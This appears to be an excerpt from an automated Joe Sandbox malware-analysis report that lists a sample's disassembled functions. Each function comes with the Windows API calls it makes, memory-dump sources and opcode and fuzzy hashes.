                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00451410 Relevance: 4.7, APIs: 3, Instructions: 190fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(?,?,?,D13B3340,?), ref: 004514DC
                                                    • FindNextFileW.KERNEL32(000000FF,00000010,?,D13B3340,?), ref: 00451633
                                                    • FindClose.KERNEL32(000000FF,?,?,D13B3340,?), ref: 00451692
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Find$File$CloseFirstNext
                                                    • String ID:
                                                    • API String ID: 3541575487-0
                                                    • Opcode ID: 34a4899de0a9f9fb18c4ec66d0188fdafa29d639af77b2f5e13ff5b546b2ab1b
                                                    • Instruction ID: 8dad8c9c6575871aa77e418d178d195676e5ad471602b5525f1be4d1ff39df1d
                                                    • Opcode Fuzzy Hash: 34a4899de0a9f9fb18c4ec66d0188fdafa29d639af77b2f5e13ff5b546b2ab1b
                                                    • Instruction Fuzzy Hash: F981AF70D01249DFDB24DF68C999BEEBBB4FF44300F548299E815672A1EB746E88CB50
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0036EFE0 Relevance: 4.6, APIs: 3, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsWindow.USER32(00000004), ref: 0036F02E
                                                    • GetWindowLongW.USER32(00000004,000000FC), ref: 0036F047
                                                    • SetWindowLongW.USER32(00000004,000000FC,?), ref: 0036F059
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$Long
                                                    • String ID:
                                                    • API String ID: 847901565-0
                                                    • Opcode ID: 13e8222b9c24a8d1f6edf2ed631c04635a20a80667854456a4e56d20e130c921
                                                    • Instruction ID: 89749179d59bf45b0dc28123814f96fe845fb03bb30d98d6083cabbe0fc16b3a
                                                    • Opcode Fuzzy Hash: 13e8222b9c24a8d1f6edf2ed631c04635a20a80667854456a4e56d20e130c921
                                                    • Instruction Fuzzy Hash: BD417AB0604606EFDB15DF65D908B5AFBB4FF05324F108268E4249B691DB76E914CBD0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00372C90 Relevance: 4.6, APIs: 3, Instructions: 87COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowLongW.USER32(00000003,000000FC), ref: 00372CE6
                                                    • SetWindowLongW.USER32(00000003,000000FC,?), ref: 00372CF8
                                                    • DeleteCriticalSection.KERNEL32(?,D13B3340,?,?,?,?,0054D5E4,000000FF), ref: 00372D23
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: LongWindow$CriticalDeleteSection
                                                    • String ID:
                                                    • API String ID: 1978754570-0
                                                    • Opcode ID: a8a105f1f1381b15791d4e12bfb6a1748b74800d187df3a64fc601a52d21d886
                                                    • Instruction ID: 8e62a0f29fd736d0bf7d2fab21902bf9d747f83ac204088bb1181605e2676ecd
                                                    • Opcode Fuzzy Hash: a8a105f1f1381b15791d4e12bfb6a1748b74800d187df3a64fc601a52d21d886
                                                    • Instruction Fuzzy Hash: AB31C2B1504606ABCB21DF68CC08B9ABFE8BF05310F108359E828D7691D775EA14CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 005250F3 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE
                                                    Download Yara Rule
                                                    APIs
                                                    • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 005251EB
                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 005251F5
                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00525202
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                    • String ID:
                                                    • API String ID: 3906539128-0
                                                    • Opcode ID: a6f807e6534659eacc88af1bda8b897c150eea74caa961a2b5698958e8213cc4
                                                    • Instruction ID: 816bff1e6cb5660d294884a769f3c6c1637543af34e131d3f38246172e1cabcd
                                                    • Opcode Fuzzy Hash: a6f807e6534659eacc88af1bda8b897c150eea74caa961a2b5698958e8213cc4
                                                    • Instruction Fuzzy Hash: 05310574941329ABCB21DF24D98979DBBB8BF19310F1041EAE51CA7291EB309F858F54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0035A000 Relevance: 4.6, APIs: 3, Instructions: 65COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadResource.KERNEL32(00000000,00000000,D13B3340,00000001,00000000,?,00000000,00547D20,000000FF,?,00359FAC,D13B3340,?,?,000000A0,?), ref: 0035A02B
                                                    • LockResource.KERNEL32(00000000,?,00359FAC,D13B3340,?,?,000000A0,?,A0BA0035,005483F0,000000FF,?,0035A150,?,?,000000A0), ref: 0035A036
                                                    • SizeofResource.KERNEL32(00000000,00000000,?,00359FAC,D13B3340,?,?,000000A0,?,A0BA0035,005483F0,000000FF,?,0035A150,?,?), ref: 0035A044
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Resource$LoadLockSizeof
                                                    • String ID:
                                                    • API String ID: 2853612939-0
                                                    • Opcode ID: c15494757f6f2b074f79070747ef6e0cdeb8bbaed035d324f2d4d6d7883d1f2d
                                                    • Instruction ID: ae827ef12b2c2e419b59d9b27e87a8e9d67503a7869555f8e3a7c2258af23ab7
                                                    • Opcode Fuzzy Hash: c15494757f6f2b074f79070747ef6e0cdeb8bbaed035d324f2d4d6d7883d1f2d
                                                    • Instruction Fuzzy Hash: 1711E772E14A559BC7358F19DC44F76F7E8FB89721F014A2AED1AD3290EA35AC088690
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00367B50 Relevance: 4.5, APIs: 3, Instructions: 28COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowLongW.USER32(0000001B,000000FC), ref: 00367B69
                                                    • SetWindowLongW.USER32(0000001B,000000FC,?), ref: 00367B77
                                                    • DestroyWindow.USER32(0000001B), ref: 00367BA3
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Window$Long$Destroy
                                                    • String ID:
                                                    • API String ID: 3055081903-0
                                                    • Opcode ID: c15c4563e54f219307ea6dd5a9defd9a9d10f2155de380542236e4553c170948
                                                    • Instruction ID: 3e643ec780f7fcf761ff93bb0f759f18c54ee4e3a4b0171b3d821763cb9fabd1
                                                    • Opcode Fuzzy Hash: c15c4563e54f219307ea6dd5a9defd9a9d10f2155de380542236e4553c170948
                                                    • Instruction Fuzzy Hash: 70F01D70008A129BDB716B28ED04B92BFE1BF05725F14871DE4AA825F1D771A840DB40
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0037F9F0 Relevance: 3.3, APIs: 2, Instructions: 258windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,0000102B,00000000,00000001), ref: 0037FB1B
                                                    • SendMessageW.USER32(?,0000102B,?,-00000002), ref: 0037FD05
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: 99cfb13a8df1a92f32c0c28ac564b3a0ba0a82ab287b67737987fea8f49a531b
                                                    • Instruction ID: e680ff90917374539d58485384f74ac6a6d7dfca959b5fe960721204e55cb940
                                                    • Opcode Fuzzy Hash: 99cfb13a8df1a92f32c0c28ac564b3a0ba0a82ab287b67737987fea8f49a531b
                                                    • Instruction Fuzzy Hash: E0B1E371A006069FCB2ADF24C995BA9FBF5FF09304F158269E859DF285D734E940CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C40A0 Relevance: 3.1, APIs: 2, Instructions: 75COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowLongW.USER32(00000000,000000FC), ref: 003C410F
                                                    • SetWindowLongW.USER32(00000000,000000FC,?), ref: 003C411D
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: LongWindow
                                                    • String ID:
                                                    • API String ID: 1378638983-0
                                                    • Opcode ID: e8a0fa65b9373a4e7ce5a776b4df89bb35709d71ab692338b2f318647f846da3
                                                    • Instruction ID: b92a87fc953de827033e7456a49eba54dd8e0573e593c33979ad9275064b682f
                                                    • Opcode Fuzzy Hash: e8a0fa65b9373a4e7ce5a776b4df89bb35709d71ab692338b2f318647f846da3
                                                    • Instruction Fuzzy Hash: 29317871904606EFDB21DF69C944B9AFBB4FF05320F148269E824EB6E1D731AD50CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0046E270 Relevance: 3.1, APIs: 2, Instructions: 71fileCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • FindFirstFileW.KERNEL32(00000000,?,D13B3340,?,00000000,00000000,00000000,005882FD,000000FF), ref: 0046E2D8
                                                    • FindClose.KERNEL32(00000000,?,D13B3340,?,00000000,00000000,00000000,005882FD,000000FF), ref: 0046E322
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: Find$CloseFileFirst
                                                    • String ID:
                                                    • API String ID: 2295610775-0
                                                    • Opcode ID: 34424e9f50a11b40eb9426851b0c62eb2b7c39accfe23272750a6ebb4a09342f
                                                    • Instruction ID: d83e2713ce537a09fbe8988c20da4010da26aea8b8f7d8764ea9eebd79fa526c
                                                    • Opcode Fuzzy Hash: 34424e9f50a11b40eb9426851b0c62eb2b7c39accfe23272750a6ebb4a09342f
                                                    • Instruction Fuzzy Hash: 9321E2359005499FD710DF68DC49BEEFBB8FF84324F10426AE824972D0EB345A08CB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0038DA20 Relevance: 3.0, APIs: 2, Instructions: 10COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • __set_se_translator.LIBVCRUNTIME ref: 0038DA25
                                                    • SetUnhandledExceptionFilter.KERNEL32(Function_0011B960), ref: 0038DA3B
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ExceptionFilterUnhandled__set_se_translator
                                                    • String ID:
                                                    • API String ID: 2480343447-0
                                                    • Opcode ID: 4b7b046eb452c4b366deb610293cd94963587350759c1505d50bb085909f7fd8
                                                    • Instruction ID: bd3019ab07128183ecba35c0850e9cbabd69dbc1b07cab81f7a2388801128d9d
                                                    • Opcode Fuzzy Hash: 4b7b046eb452c4b366deb610293cd94963587350759c1505d50bb085909f7fd8
                                                    • Instruction Fuzzy Hash: EAD012A0A48344ABE716A364B84A7653F61A772714F181486D842412D1E7BA29C8D7A7
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0040EF50 Relevance: 2.6, Strings: 2, Instructions: 86COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: T$\$|$\
                                                    • API String ID: 0-3399885332
                                                    • Opcode ID: 8eff5f78d075d2ea43ec82d1d91826a9f772b3769907f9791d8f85b31e2ac8f4
                                                    • Instruction ID: bca43bd1616a697c78ee3b16e3aab9556f35e3176fd0132b2a768c5e225d17bd
                                                    • Opcode Fuzzy Hash: 8eff5f78d075d2ea43ec82d1d91826a9f772b3769907f9791d8f85b31e2ac8f4
                                                    • Instruction Fuzzy Hash: C04102B0905B49EED714CF69C14878AFFF0BB19318F20825DD4589B781D3BAA658CBD4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C7500 Relevance: 1.8, Strings: 1, Instructions: 521COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: ExceptionRaise__floor_pentium4
                                                    • String ID: unordered_map/set too long
                                                    • API String ID: 996205981-306623848
                                                    • Opcode ID: 5c15348de3c5c5b1eea0450201f972d6de6d73ca475963a8346708d6c2b33d3a
                                                    • Instruction ID: f522d035c550ded7d07e7d7821d70ffa9d517a5cf0e509ca2b13ec1dacb2de39
                                                    • Opcode Fuzzy Hash: 5c15348de3c5c5b1eea0450201f972d6de6d73ca475963a8346708d6c2b33d3a
                                                    • Instruction Fuzzy Hash: 1512BF71A046099FCB19DF68C885BADBBF5FF98310F14826AE815EB391D730AD51CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00378270 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • NtdllDefWindowProc_W.NTDLL(?,-00002000,?,?,003769C7,?,?,?,?,?,?,?,?,00376838,?,?), ref: 003782C0
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: NtdllProc_Window
                                                    • String ID:
                                                    • API String ID: 4255912815-0
                                                    • Opcode ID: cc1e46159a0b408f533e9dbc5c49ba39d8b3e15ec41a9032ce033979f039e043
                                                    • Instruction ID: cf82ef107253a860ef2be0a0d9ec68a9981c94e8fa28ba821d00f97cceb86153
                                                    • Opcode Fuzzy Hash: cc1e46159a0b408f533e9dbc5c49ba39d8b3e15ec41a9032ce033979f039e043
                                                    • Instruction Fuzzy Hash: 0CF0E234148041CEE3228B58C85CA6ABBE6FB0530BF4489E5E44CD50A2CB399D41CF20
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0036EE70 Relevance: 1.3, Strings: 1, Instructions: 69COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: \[
                                                    • API String ID: 0-243666616
                                                    • Opcode ID: 46d512954dbffea975ae70c9c7d5fed1275619a34aa3c78b9e730ac312ab08ca
                                                    • Instruction ID: b0b304909cb39a38f3510176ebad6657aaf224c60109fe30ae47adcccb15aacc
                                                    • Opcode Fuzzy Hash: 46d512954dbffea975ae70c9c7d5fed1275619a34aa3c78b9e730ac312ab08ca
                                                    • Instruction Fuzzy Hash: BA31B0B0405B84CEE721CF69C658787BFF4BB15718F108A4DD4A64BB91D3BAB608CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0053CE19 Relevance: .6, Instructions: 637COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4eee9aa4a7af393264e6d1d3c4d7d68585c7512b6b8a41fa5f9b2fc758ac5c06
                                                    • Instruction ID: 0941b04d65d9a9acd086434d76731ef578de7cbb9a824a4eeb91ec1f8f85ff4c
                                                    • Opcode Fuzzy Hash: 4eee9aa4a7af393264e6d1d3c4d7d68585c7512b6b8a41fa5f9b2fc758ac5c06
                                                    • Instruction Fuzzy Hash: 02320332D29F414DD723A634D822335A7A9BFB73C4F15D727E81AB5DAAEB28C4835110
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00528A2C Relevance: .4, Instructions: 388COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.768935056.0000000000351000.00000020.00000001.01000000.00000003.sdmp, Offset: 00350000, based on PE: true
                                                    • Associated: 00000000.00000002.768901935.0000000000350000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769823210.00000000005A8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769913007.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769923389.0000000000636000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769932978.0000000000637000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.769945020.0000000000641000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_350000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 71aa5f8e0e991819a1056f4e119062cf4d654de0ab498cdebc988ac5368666fd
                                                    • Instruction ID: 5d8a03248b9026c133fd194aa97eac686cf185097d4212feeac15d9ecb4d50db
                                                    • Opcode Fuzzy Hash: 71aa5f8e0e991819a1056f4e119062cf4d654de0ab498cdebc988ac5368666fd
                                                    • Instruction Fuzzy Hash: 0CE1BD706026258FCB28CFA8E484ABEBBB1BF56310B244A5ED4569B2D1DF30AD45CB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

